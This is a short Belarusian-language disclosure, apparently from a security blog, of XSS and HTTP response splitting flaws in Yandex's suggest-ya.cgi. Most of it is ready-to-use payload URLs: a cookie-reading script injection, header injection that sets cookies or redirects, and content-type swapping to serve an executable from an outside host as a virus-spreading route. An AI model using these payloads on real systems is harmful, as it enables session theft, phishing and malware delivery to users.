* Тып уразлівасці: Межсайтовое выкананне сцэнараў (Cross-site Scripting, XSS). Недастатковае фільтраванне змесціва зменнай.
Прыкладанне: /suggest-ya.cgi
GET-зменныя: part
Прыклад: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=alert(document.cookie)
* Тып уразлівасці: Расшчапленне HTTP-запыту (HTTP Response Splitting) Прыкладанне: /suggest-ya.cgi GET-зменныя: ct Прыклад: ttp://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (усталёўвае cookie ад імя сервера) Простыя прыклады ўжывання, не кажучы ўжо аб складаных варыянтах. * Універсальны редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru * Выкарыстанне ўразлівасцяў іншых прыкладанняў або распостранение вірусаў (падмена content-type) Можна прапанаваць, да прыкладу, запампаваць з Яндэкса пышную праграму Firefox з пошукам Яндэкса http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru Або любое іншае прыкладанне або мультымедыя-файл. Да прыкладу. http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru * Падмена змесціва старонкі - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru//&part=fuzzing.ru